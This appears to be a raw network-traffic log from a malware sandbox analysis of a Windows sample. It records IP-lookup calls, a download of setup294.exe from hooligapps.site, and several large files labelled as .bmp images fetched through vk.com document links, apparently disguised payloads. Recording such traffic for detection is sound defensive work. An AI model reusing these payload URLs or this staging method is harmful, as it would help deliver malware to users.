Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:35:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CwAc5364Oq7I2SIrc5JVpOLsxRQGofyif85fTCeR%2FQ9YygD3qTBUnaUjvdUGzHWVWPyckqUWgPrv3T3f8IROaxBYOggDMpYEykYItFccW%2F0x6LHvQFQfGBx5ZPXhVg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ef9a80e9e4b834c-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Mon, 31 Jul 2023 23:35:17 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 247894 Connection: keep-alive X-Powered-By: KPHP/7.4.114284 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Thu, 25 Jul 2024 22:28:12 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9095267580279111948_K6CDJqPm98ga1VpiwlXLLQqWbAzLForrv8G2kPrUWEL; expires=Tue, 30 Jul 2024 23:35:17 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=97418a290371baebc6; expires=Tue, 06 Aug 2024 18:21:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=851300446_QDjjvwjl2QTjwqElvLPC0erA2O1Z2tQ0LEx8qa8bTwc; expires=Sun, 04 Aug 2024 11:42:09 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hooligapps.site Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:35:21 GMT Content-Type: application/x-msdos-program Content-Length: 1498649 Connection: keep-alive Last-Modified: Mon, 31 Jul 2023 22:53:24 GMT ETag: "16de19-601d04c3aa100" Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R%2Bq44N%2FEWe1xO6g8d0ol8XIjTqqfA2Mi8ltekxJzrCyfoNArfSqfCdhTh%2FR%2B4QzCOGy3cY5lrEwrAXx2Y749JwID5d%2BrO8zhwGyzJ3MCFuaOomOKeNwohJQwCJ3uZPTxcFE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ef9a8436cfe0ac6-KIX alt-svc: h3=":443"; ma=86400

GET /doc801981293_667066083?hash=m6Sjui2f4HpWtz9GQYumUhPuRTfIRk3Z6g4OA7TOD4L&dl=QdPsOGLXyKwtXjXJewQAbmRgAgTggz12uJxZZc3F10c&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9095267580279111948_K6CDJqPm98ga1VpiwlXLLQqWbAzLForrv8G2kPrUWEL; remixlgck=97418a290371baebc6; remixstid=851300446_QDjjvwjl2QTjwqElvLPC0erA2O1Z2tQ0LEx8qa8bTwc

HTTP/1.1 302 Found Server: kittenx Date: Mon, 31 Jul 2023 23:35:23 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114284 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909328/u801981293/docs/d24/084544a6c731/oip0uc82pz.bmp?extra=7iBeThmhh6DgxxYaPSgYpUe2xaYhvy6ZK-0HMLVHTGLGhFsWaOMYzD4oPREABqJmmPxnl2RS147cj8tiTALRAueLEt6VQbMoYwkK8FAFUhT-iPqHGu8D_3g2StFRnl2plAP3lJhvQaXWy0u0kA X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909328/u801981293/docs/d24/084544a6c731/oip0uc82pz.bmp?extra=7iBeThmhh6DgxxYaPSgYpUe2xaYhvy6ZK-0HMLVHTGLGhFsWaOMYzD4oPREABqJmmPxnl2RS147cj8tiTALRAueLEt6VQbMoYwkK8FAFUhT-iPqHGu8D_3g2StFRnl2plAP3lJhvQaXWy0u0kA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 31 Jul 2023 23:35:24 GMT Content-Type: image/x-ms-bmp Content-Length: 1152516 Connection: keep-alive Last-Modified: Thu, 27 Jul 2023 14:59:37 GMT ETag: "64c28659-119604" Expires: Wed, 30 Aug 2023 23:35:24 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9095267580279111948_K6CDJqPm98ga1VpiwlXLLQqWbAzLForrv8G2kPrUWEL; remixlgck=97418a290371baebc6; remixstid=851300446_QDjjvwjl2QTjwqElvLPC0erA2O1Z2tQ0LEx8qa8bTwc; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Mon, 31 Jul 2023 23:35:26 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 247910 Connection: keep-alive X-Powered-By: KPHP/7.4.114284 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc801981293_667237000?hash=wJ5uCBdRHZzUjQjWqgBH48skmucYHiYj2GRiSACkdpw&dl=0FKa00zk0GBCzSFOZ7oP1FKOpaxYtVDdsq7vQUc0Gm4&api=1&no_preview=1#s HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9095267580279111948_K6CDJqPm98ga1VpiwlXLLQqWbAzLForrv8G2kPrUWEL; remixlgck=97418a290371baebc6; remixstid=851300446_QDjjvwjl2QTjwqElvLPC0erA2O1Z2tQ0LEx8qa8bTwc

HTTP/1.1 302 Found Server: kittenx Date: Mon, 31 Jul 2023 23:35:30 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114284 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909618/u801981293/docs/d44/475e3b19467d/s.bmp?extra=CXhY0FYqAixfAe5gJo7Du2h3NIxPT1pwd6-OGYvPBrGUFvJMhPwurTncp5qAumXPeaEsjP-9apm2cztbCqwM3BtYwSrG2usVk_yUD9MqnSphi6K9Aq2Kc23k8YWxnMAVObcde_7Phogwv24YQg X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc801981293_667028020?hash=zNXj4WrlTyEKRUBB0vxsLD8HwE7hYL7JgYi8vgPFINH&dl=UHDS7B9XXtrml8Ov9nEnY8cZe5Q3T6Z0UJqbZWjTksT&api=1&no_preview=1#scjeen HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9095267580279111948_K6CDJqPm98ga1VpiwlXLLQqWbAzLForrv8G2kPrUWEL; remixlgck=97418a290371baebc6; remixstid=851300446_QDjjvwjl2QTjwqElvLPC0erA2O1Z2tQ0LEx8qa8bTwc; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Mon, 31 Jul 2023 23:35:31 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114284 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909218/u801981293/docs/d32/1c8ef9b2fc28/new.bmp?extra=If9Lo5F5-e1eTZGduxSFLbQb0TVGFPXkyZWdMeMv2g26HJlc5QbDck071WaX_YgB9o1UpVtPqxy4QD-RrF0Q12P3DrQDvvKj93TpO8rTUDzPo40OWhmmYf1PD6BDnURtppPdCg-zVajpOAa3yw X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u801981293/docs/d44/475e3b19467d/s.bmp?extra=CXhY0FYqAixfAe5gJo7Du2h3NIxPT1pwd6-OGYvPBrGUFvJMhPwurTncp5qAumXPeaEsjP-9apm2cztbCqwM3BtYwSrG2usVk_yUD9MqnSphi6K9Aq2Kc23k8YWxnMAVObcde_7Phogwv24YQg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 31 Jul 2023 23:35:31 GMT Content-Type: image/x-ms-bmp Content-Length: 2411524 Connection: keep-alive Last-Modified: Mon, 31 Jul 2023 15:20:43 GMT ETag: "64c7d14b-24cc04" Expires: Wed, 30 Aug 2023 23:35:31 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /c909218/u801981293/docs/d32/1c8ef9b2fc28/new.bmp?extra=If9Lo5F5-e1eTZGduxSFLbQb0TVGFPXkyZWdMeMv2g26HJlc5QbDck071WaX_YgB9o1UpVtPqxy4QD-RrF0Q12P3DrQDvvKj93TpO8rTUDzPo40OWhmmYf1PD6BDnURtppPdCg-zVajpOAa3yw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 31 Jul 2023 23:35:31 GMT Content-Type: image/x-ms-bmp Content-Length: 1761068 Connection: keep-alive Last-Modified: Wed, 26 Jul 2023 17:16:10 GMT ETag: "64c154da-1adf2c" Expires: Wed, 30 Aug 2023 23:35:31 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc801981293_667089680?hash=rVIr38BrzIinBtaaqLw8bfBo4PPqpdnYNI24AEk2s4c&dl=J840u5Bv36XIVNgrl2q6ZZe4BL6Dzqm1CKoCTOCZiz4&api=1&no_preview=1#rise_test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9095267580279111948_K6CDJqPm98ga1VpiwlXLLQqWbAzLForrv8G2kPrUWEL; remixlgck=97418a290371baebc6; remixstid=851300446_QDjjvwjl2QTjwqElvLPC0erA2O1Z2tQ0LEx8qa8bTwc; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Mon, 31 Jul 2023 23:35:31 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114284 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c909418/u801981293/docs/d19/cab0d9fd22fb/test.bmp?extra=S1lBZ2ara_uwvkUiCQO2CpDy8V8CT-DUsMDJDq5c-j9MzsI9R-MnJavBC7JjKow1RrS6V5Gt1xq0ExvtLgwopOUcyKFLyvxY2XmRgoY0ZkqV7tnvNQ-VvJNUjMmHJ0J8jIPVt2kRBM2Az8yPjA X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc801981293_667139817?hash=fnY3s9xTCH8TvBuyjrszXkHvJq23CHHvk5PULwK4ZqD&dl=CAUx7IkjdyeFKrDihPvqPbyjkgiOxZZb3jve3rrp8vL&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9095267580279111948_K6CDJqPm98ga1VpiwlXLLQqWbAzLForrv8G2kPrUWEL; remixlgck=97418a290371baebc6; remixstid=851300446_QDjjvwjl2QTjwqElvLPC0erA2O1Z2tQ0LEx8qa8bTwc

HTTP/1.1 302 Found Server: kittenx Date: Mon, 31 Jul 2023 23:35:32 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114284 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c909628/u801981293/docs/d19/0473ba2c3397/PMmp.bmp?extra=WrUP7rtQyA__XGT96VkpbA09fH6-o78MtrcF3sMNML4tfmPd86znTXohoj2oY2iq7cXqb1ogncL3vqMNV51fvJBKLzDGTPGMaC4OONg8jXxXAsBqDQAvLjke5w40Iev0XWVFSDfyPSjjzQYtIg X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909418/u801981293/docs/d19/cab0d9fd22fb/test.bmp?extra=S1lBZ2ara_uwvkUiCQO2CpDy8V8CT-DUsMDJDq5c-j9MzsI9R-MnJavBC7JjKow1RrS6V5Gt1xq0ExvtLgwopOUcyKFLyvxY2XmRgoY0ZkqV7tnvNQ-VvJNUjMmHJ0J8jIPVt2kRBM2Az8yPjA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 31 Jul 2023 23:35:32 GMT Content-Type: image/x-ms-bmp Content-Length: 6371844 Connection: keep-alive Last-Modified: Fri, 28 Jul 2023 06:53:38 GMT ETag: "64c365f2-613a04" Expires: Wed, 30 Aug 2023 23:35:32 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /c909628/u801981293/docs/d19/0473ba2c3397/PMmp.bmp?extra=WrUP7rtQyA__XGT96VkpbA09fH6-o78MtrcF3sMNML4tfmPd86znTXohoj2oY2iq7cXqb1ogncL3vqMNV51fvJBKLzDGTPGMaC4OONg8jXxXAsBqDQAvLjke5w40Iev0XWVFSDfyPSjjzQYtIg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 31 Jul 2023 23:35:33 GMT Content-Type: image/x-ms-bmp Content-Length: 6771716 Connection: keep-alive Last-Modified: Sat, 29 Jul 2023 09:44:09 GMT ETag: "64c4df69-675404" Expires: Wed, 30 Aug 2023 23:35:33 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9095267580279111948_K6CDJqPm98ga1VpiwlXLLQqWbAzLForrv8G2kPrUWEL; remixlgck=97418a290371baebc6; remixstid=851300446_QDjjvwjl2QTjwqElvLPC0erA2O1Z2tQ0LEx8qa8bTwc

HTTP/1.1 200 OK Server: kittenx Date: Mon, 31 Jul 2023 23:35:33 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 247909 Connection: keep-alive X-Powered-By: KPHP/7.4.114284 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc801981293_666878057?hash=1cohXPp9aLK2Xz7H2hezj89drs50PYuLRBoirKPj3B8&dl=vMZbPrQFZIXfQgzBVvuUmx7NUXxKHs9ZVFMOgU7roi0&api=1&no_preview=1#WW1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9095267580279111948_K6CDJqPm98ga1VpiwlXLLQqWbAzLForrv8G2kPrUWEL; remixlgck=97418a290371baebc6; remixstid=851300446_QDjjvwjl2QTjwqElvLPC0erA2O1Z2tQ0LEx8qa8bTwc; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Mon, 31 Jul 2023 23:35:34 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 247837 Connection: keep-alive X-Powered-By: KPHP/7.4.114284 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: AC46E918:439C_93878F2E:0050_64C841BD_1E6BD59E:2467C X-IPLB-Instance: 30783 CF-Cache-Status: HIT Age: 936 Last-Modified: Mon, 31 Jul 2023 23:20:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q8bj3SAwsizv%2FfOhnc5b4Hdhri8QvtFDVvCd9J%2BYhYulc64Lr8NqUsTcRmrgnukmlE9ctKdpGqq%2BdTZYCB4FSF6MOiTqxnsnzr%2BXzN8zUfukGzYehIOeX8aNBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ef9a95d08ae8373-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:06 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: 8D65569E:BA62_93878F2E:0050_64C84566_1E67EAE5:2467B X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=coK35xQt%2FUqhQQOZW%2Bv11YBrT8AGH3p5blfTMBVITKILtX%2BM3hpubujqY1dUn6rODyQL3IaiXxYK5GkaJ1rcrTdW21esRCcNbGCQlAJwjkQU7iXHrAz37ILUbGN063U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ef9a95e1f9719f8-KIX alt-svc: h3=":443"; ma=86400

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 13; SM-S901B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36 Host: db-ip.com

